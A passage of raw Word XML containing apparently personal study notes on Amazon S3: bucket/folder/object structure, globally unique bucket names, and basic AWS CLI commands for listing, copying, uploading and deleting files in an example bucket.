    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B84">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yreijkki7526" w:id="226"/>
      <w:bookmarkEnd w:id="226"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">S3 (Amazon Simple Storage Service)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sample Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">my-awesome-bucket/ (This is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bucket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">├── images/  (This a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── cat.jpg (This is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── dog.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── vacation/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">├── beach.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">└── mountains.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B8F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">├── documents/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── resume.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── project/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── report.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">└── backups/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">└── db-backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B96">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B97">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B98">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://my-awesome-bucket.s3.amazonaws.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B99">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hierarchical Structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bucket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Buckets </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MUST have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GLOBALLY unique</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> names. So if I name my bucket michael-random, then NO OTHER user in the world can have a bucket named michael-rangom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Folders can be in the same level as Objects, just like in the example above with vacation/ and dog.jpg. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigate s3 buckets in Terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display all buckets in your AWS account:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1498"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">List Contents of a Bucket (top-level):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1362"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Display all objects in the bucket, including subfolders (recursively)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="565"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://my-awesome-bucket/ --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download a File (to local machine):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="858"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp s3://my-awesome-bucket/images/cat.jpg ./cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="858"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download cat.jpg from the images folder to your local machine, and store that file as ./cat.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1080"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp newfile.txt s3://my-awesome-bucket/documents/newfile.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1080"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload newfile.txt to the documents folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete a file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="848"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 rm s3://my-awesome-bucket/documents/notes.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete an Entire Folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001BBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
